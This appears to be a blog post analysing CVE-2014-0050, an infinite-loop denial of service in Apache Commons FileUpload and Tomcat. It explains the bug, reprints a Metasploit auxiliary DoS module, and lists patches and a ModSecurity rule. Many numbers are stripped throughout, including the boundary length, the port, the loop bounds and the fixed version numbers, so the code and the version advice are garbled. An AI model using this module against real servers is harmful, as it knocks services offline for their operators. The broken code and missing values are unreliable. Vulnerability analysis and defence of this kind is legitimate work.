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f+vEHy67xN92C3WTJQ+6J95kUdFp9GSbN8ztHTMVrVtc2KS1q5Efn1dvupjHu3661k1f0dnltf582T7N6jnf2LiIh8PopMRaYiM5rzM4rMaaZ+15Lfd2vP3XB/V618d3prm80nc/j9FRFZm+nqzdM/rl+IjcvXe+wtGnR/fQVPuMWjtD1SGSgautug+GWl2eJ1Uo0NR8mnGs0kL0SSamDVKMM1z5flPtdbSXJ1wzdMNMO174RVk6zcERERkftnWP61z/f5U29YNiSFRDJQNHS3QfHLSrPF652lxeeLruIowzXPl+U+11tJcnXDN0w0w7XvhFWTrNyRPZ3n17t4HY1eXKv2znYPtvd37dtvOL2oWXfOq5ZRROSMTFdvnv5x/UJsWbtC0fD+btQsf/YUHwlTI5peMtzmJ1z7ujLc8ALXnjuc8LDaWztK0sPa8uKS660kubpKxTbss7IyqyZZuSMiIiI3jyIz6lCRqciszLDSeO0kK3dkT+fF652PW1mZ4hujONbat9/+3/sblktE5LxMV2+e/nH9QmxfwdGndveRUCyJioVR0v7z1e2qJ2ulLtlz7rA4W1uiHVvdXnW93ZJreLvzGRarvfrV1euhbdXtqiFEREQ+H0Vmcc6KzPtcryKzPkTxN0J33KPOrdzf+RWtWvl8Afevc9KhiMhJma7ePP3j+oU4d5VnoiOL48mRaIhX/JyLhp5/Nxq6exX5heRDdBcnX5Z8MvlaTT3dlXk1D+zoKqKek3Fvdb3dEYtv3XahojknM4zewElXw+lN8T1KlrSyCCIiIrdN+6ROnt2VQqI7xGv2pO6WFu3QbeGRPIW7zZIToyG6i5MvSz6ZfK2mnu7KvH6WOslVRD0n497qersjFt+67UJFc05mGL2Bk66G05vie5QsabH/+rK0I3bHPerc9svKzCsLmDerzzm64yIi58UWquzK855ba6/oS1dgz7R3XnJen31yYb/03omIiPyGPO8xrcg8+5J/T5G52G08+3LumV974SJyYWyhyvZEdcnvyTeuwJ4Jf+Z6nzGEiIiIbM43llhWQJH5mSE+uWIiIjKPLVQRERERERERERGRMLZQRURERERERERERMLYQhUREREREREREREJYwtVREREREREREREJIwtVBERERF5Zv7v/xUREREROSC2UEVERETkmbm81BYRERGRZ8QWqoickm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" alt="" />

The fixed code has an extra "if" condition (line number 330) that validates the length of the multipart boundary to be shorter than 4091 characters, raising an exception if that's not the case. The calculation is as follows:

boundary.length > bufSize –  – BOUNDARY_PREFIX.length =  –  –  =

//parts of the code were copied into the org.apache.tomcat.util.http.fileupload package in Apache Tomcat, causing it to be affected.

0x2: Creating the exploit

So let's get Apache Tomcat installed and try to send more than 4091 characters in the boundary field to the Apache Tomcat Manager application. Such a request might look like this:

0x3: Why is this happening

While parsing the multipart message, the following "for" loop is used by the MultipartStream class:

The innocent-looking "for" loop above is an endless loop. It is "family related" to the famous "while(true)" loop. The developer's intention was to exit this loop either by raising an exception (line 1003) or by returning a value (line 1014), unfortunately when the boundary is longer than 4091 characters (as explained earlier) and the body is longer than 4096 characters (so it can potentially contain the boundary), neither would ever occur

Relevant Link:

https://www.trustwave.com/Resources/SpiderLabs-Blog/CVE-2014-0050--Exploit-with-Boundaries,-Loops-without-Boundaries/

3. POC

0x1: Metasploit

msf > use auxiliary/dos/http/apache_commons_fileupload_dos

msf auxiliary(apache_commons_fileupload_dos) > show actions

    ...actions...

msf auxiliary(apache_commons_fileupload_dos) > set ACTION <action-name>

msf auxiliary(apache_commons_fileupload_dos) > show options

    ...show and set options...

msf auxiliary(apache_commons_fileupload_dos) > run

0x2: apache_commons_fileupload_dos.rb

##

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

##

require 'msf/core'

class Metasploit4 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  include Msf::Auxiliary::Dos

  def initialize(info = {})

    super(update_info(info,

      'Name'            => 'Apache Commons FileUpload and Apache Tomcat DoS',

      'Description'     => %q{

        This module triggers an infinite loop in Apache Commons FileUpload 1.0

        through 1.3 via a specially crafted Content-Type header.

        Apache Tomcat  and Apache Tomcat  use a copy of FileUpload to handle

        mime-multipart requests, therefore, Apache Tomcat 7.0. through 7.0.

        and 8.0.-RC1 through 8.0. are affected by this issue. Tomcat  also

        uses Commons FileUpload as part of the Manager application.

       },

       'Author'         =>

         [

           'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.

           'ribeirux' # metasploit module

         ],

       'License'        => MSF_LICENSE,

       'References'     =>

         [

           ['CVE', '2014-0050'],

           ['URL', 'http://tomcat.apache.org/security-8.html'],

           ['URL', 'http://tomcat.apache.org/security-7.html']

         ],

        'DisclosureDate' => 'Feb 6 2014'

      ))

      register_options(

        [

          Opt::RPORT(),

          OptString.new('TARGETURI', [ true,  "The request URI", '/']),

          OptInt.new('RLIMIT', [ true,  "Number of requests to send",])

        ], self.class)

  end

  def run

    boundary = ""*

    opts = {

      'method'         => "POST",

      'uri'            => normalize_uri(target_uri.to_s),

      'ctype'          => "multipart/form-data; boundary=#{boundary}",

      'data'           => "#{boundary}00000",

      'headers' => {

        'Accept' => '*/*'

      }

    }

    # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby

    # This should be rewritten with .upto() or Enumerable#each or

    # something

    for x in ..datastore['RLIMIT']

      print_status("Sending request #{x} to #{peer}")

      begin

        c = connect

        r = c.request_cgi(opts)

        c.send_request(r)

        # Don't wait for a response

      rescue ::Rex::ConnectionError => exception

        print_error("#{peer} - Unable to connect: '#{exception.message}'")

        return

      ensure

        disconnect(c) if c

      end

    end

  end

end

Relevant Link:

https://www.rapid7.com/db/modules/auxiliary/dos/http/apache_commons_fileupload_dos

https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb

4. Solution

0x1: Defend yourself 

. Once available, update your software to one of the following versions:

Apache Commons FileUpload 1.3.

Apache Tomcat 7.0.

Apache Tomcat 8.0.

. You may choose to apply the appropriate patch:

Apache Commons FileUpload: http://svn.apache.org/r1565143

Apache Tomcat : http://svn.apache.org/r1565163

Apache Tomcat : http://svn.apache.org/r1565169

0x2: ModSecurity Commercial Rule Set

SecRule REQUEST_HEADERS:Content-Type "@rx .{4000}"

Relevant Link:

http://tomcat.apache.org/security-7.html

Copyright (c) 2015 Little5ann All rights reserved

CVE-2014-0050: Exploit with Boundaries, Loops without Boundaries、Apache Commons FileUpload and Apache Tomcat DoS的更多相关文章

  1. <2014 08 29> MATLAB的软件结构与模块、工具箱简示

    MATLAB的系统结构:三个层次.九个部分 ----------------------------------- 一.基础层 是整个系统的基础,核心内容是MATLAB部分. 1.软件主包MATLAB ...

  2. 2014.1.21 DNS大事故(dns原理、网络封锁原理)

    1.21那天发生了什么,由1.21联想补充……  很多网站都上不去,域名解析都到了65.49.2.178这个IP地址 先科普,再深挖  dns查询类型 递归查询,迭代查询   DNS解析过程,这里使用 ...

  3. 小白日记15:kali渗透测试之弱点扫描-漏扫三招、漏洞管理、CVE、CVSS、NVD

    发现漏洞 弱点发现方法: 1.基于端口服务扫描结果版本信息,比对其是否为最新版本,若不是则去其 官网查看其补丁列表,然后去逐个尝试,但是此法弊端很大,因为各种端口应用比较多,造成耗时大. 2.搜索已公 ...

  4. fastjson反序列化漏洞原理及利用

    重要漏洞利用poc及版本 我是从github上的参考中直接copy的exp,这个类就是要注入的类 import java.lang.Runtime; import java.lang.Process; ...

  5. J2EE项目开发中常用到的公共方法

    在项目IDCM中涉及到多种工单,包括有:服务器|网络设备上下架工单.服务器|网络设备重启工单.服务器光纤网线更换工单.网络设备撤线布线工单.服务器|网络设备替换工单.服务器|网络设备RMA工单.通用原 ...

  6. J2EE相关总结

    Java Commons The Java™ Tutorials: http://docs.oracle.com/javase/tutorial/index.html Java Platform, E ...

  7. DatagramChannel

    DatagramChannel 最后一个socket通道是DatagramChannel.正如SocketChannel对应Socket,ServerSocketChannel对应ServerSock ...

  8. Servlet实现文件上传

    一.Servlet实现文件上传,需要添加第三方提供的jar包 下载地址: 1) commons-fileupload-1.2.2-bin.zip      :   点击打开链接 2) commons- ...

  9. 使用jetty和mongodb实现简易网盘接口

    依赖库: 1,jetty(提供http方式接口) 2,mongodb的java驱动(访问mongodb存取文件) 3,thumbnailator包,进行缩略图生成 4,commons-fileuplo ...

随机推荐

  1. noi题库(noi.openjudge.cn) 1.7编程基础之字符串T31——T35

    T31 字符串P型编码 描述 给定一个完全由数字字符('0','1','2',-,'9')构成的字符串str,请写出str的p型编码串.例如:字符串122344111可被描述为"1个1.2个 ...

  2. mybatis3.2.8 与 hibernate4.3.6 混用

    mybatis.hibernate这二个框架各有特色,对于复杂的查询,利用mybatis直接手写sql控制起来更灵活,而一般的insert/update,hibernate比较方便.同一个项目中,这二 ...

  3. 2014-2015-2 《Java程序设计》课程学生博客列表

    20135101 曹钰晶 20135103 王海宁 20135104 刘 帅 20135105 王雪铖 20135109 高艺桐 20135111 李光豫 20135114 王朝宪 20135116 ...

  4. servlet乱码问题总结

    在学习时servlet乱码问题还是挺严重的,总结一下有三种情况 1.新建HTML页面后浏览出现乱码 2.以post形式请求时出现乱码 3.以get形式请求时出现乱码 让我们一个一个来解决吧 1.新建H ...

  5. Android Studio代码混淆插件

    之前给公司的App添加代码混淆,在代码的混淆过程也遇到了不少的问题,再加上最近学习了一下Android Studio插件的开发,所以就开发一个代码混淆插件方便项目的代码混淆. 截图 第三方库列表清单 ...

  6. 微信公众平台SDK

    微信公众平台网址:https://mp.weixin.qq.com/ 服务号说明:给企业和组织提供更强大的业务服务与用户管理能力,帮助企业快速实现全新的公众号服务平台. .NETSDK: Loogn. ...

  7. MVC认知路【点点滴滴支离破碎】【三】----IIS7.5上部署MVC4.0

    发布web到iis不能运行Google   ----- ╲ http://stackoverflow.com/questions/12057540/installing-asp-net-mvc-4-o ...

  8. linux基础-附件1 linux系统启动流程

    附件1 linux系统启动流程 最初始阶段当我们打开计算机电源,计算机会自动从主板的BIOS(Basic Input/Output System)读取其中所存储的程序.这一程序通常知道一些直接连接在主 ...

  9. 枚举型Enum和结构型Stuct

    枚举型实质就是使用符号来表示的一组相互关联的数据. Season currentSeason,nextSeason; currentSeason = Season.Spring; nextSeason ...

  10. Mod4-PHP编码规范

    loading... 归纳总结了能找到的一些编码规范,形成自己所需要的编码规范. 参考网址:1.2 一.文件格式 缩进使用四个空格,不使用制表符.左花括号不另起一行. if (1 == $x) { $ ...